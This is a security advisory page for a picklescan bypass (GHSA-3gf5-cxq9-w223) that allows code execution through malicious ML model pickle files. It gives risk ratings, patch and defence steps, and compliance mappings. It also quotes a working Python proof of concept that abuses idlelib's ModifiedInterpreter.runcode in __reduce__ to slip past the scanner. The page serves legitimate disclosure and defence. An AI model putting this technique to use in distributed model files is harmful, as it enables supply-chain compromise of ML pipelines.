GHSA-3gf5-cxq9-w223: picklescan: scanner bypass enables pickle RCE in ML models

GHSA-3gf5-cxq9-w223 MEDIUM
Published August 26, 2025
CISO Take

If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.

Risk Assessment

Practical risk is HIGH despite medium CVSS. This vulnerability defeats a security control specifically implemented to prevent pickle-based RCE — the exact threat it was designed to block. With a public PoC, exploitation is trivial. The blast radius is any pipeline that treats a picklescan pass as authorization to load a model file, which is likely the common deployment pattern. Supply chain attack potential is significant: a single poisoned model on HuggingFace Hub or similar registry could compromise many downstream environments.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.30 0.0.30
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

5 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).

  2. AUDIT

    Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.

  3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.

  4. DETECT

    Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from Python interpreter).

  5. PREFER SAFE FORMATS

    Where possible, prefer safetensors over pickle-based formats for model distribution.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, robustness and cybersecurity of high-risk AI systems Art.17 - Quality management system — supply chain obligations
ISO 42001
A.6.1.6 - AI system supply chain risk management A.8.3 - AI system security
NIST AI RMF
GOVERN 6.1 - Policies for AI risk in the supply chain MANAGE 2.2 - Mechanisms to sustain effectiveness of risk treatments
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling / Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-3gf5-cxq9-w223?

If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.

Is GHSA-3gf5-cxq9-w223 actively exploited?

No confirmed active exploitation of GHSA-3gf5-cxq9-w223 has been reported, but organizations should still patch proactively.

How to fix GHSA-3gf5-cxq9-w223?

1. PATCH: Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass). 2. AUDIT: Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised. 3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources. 4. DETECT: Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from Python interpreter). 5. PREFER SAFE FORMATS: Where possible, prefer safetensors over pickle-based formats for model distribution.

What systems are affected by GHSA-3gf5-cxq9-w223?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, agent frameworks loading external tools/models.

What is the CVSS score for GHSA-3gf5-cxq9-w223?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace( executing=False, beginexecuting=str, canceled=False, closing=False, showtraceback=str, endexecuting=str, stderr=None, text=SimpleNamespace(), getvar=str ), rpcclt=None, debugger=None, checklinecache=str, active_seq=None, showtraceback=str, canceled=False, closing=False ) return ModifiedInterpreter.runcode, (fake_self, payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary uploads a PyTorch model (.pt file) to a public model hub or sends it via a supply chain vector. The file embeds a `__reduce__` method using `idlelib.pyshell.ModifiedInterpreter.runcode` — not in picklescan's blocklist — to execute an OS command. A target organization's automated MLOps pipeline downloads the model, runs picklescan for validation (result: CLEAN), then calls `torch.load()` or `pickle.load()`. On load, the payload executes: reverse shell, credential theft, or lateral movement. Because the compromise happens inside the Python process at model-load time, it inherits all permissions of the ML worker — often a privileged service account with access to training data, secrets, and inference infrastructure.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities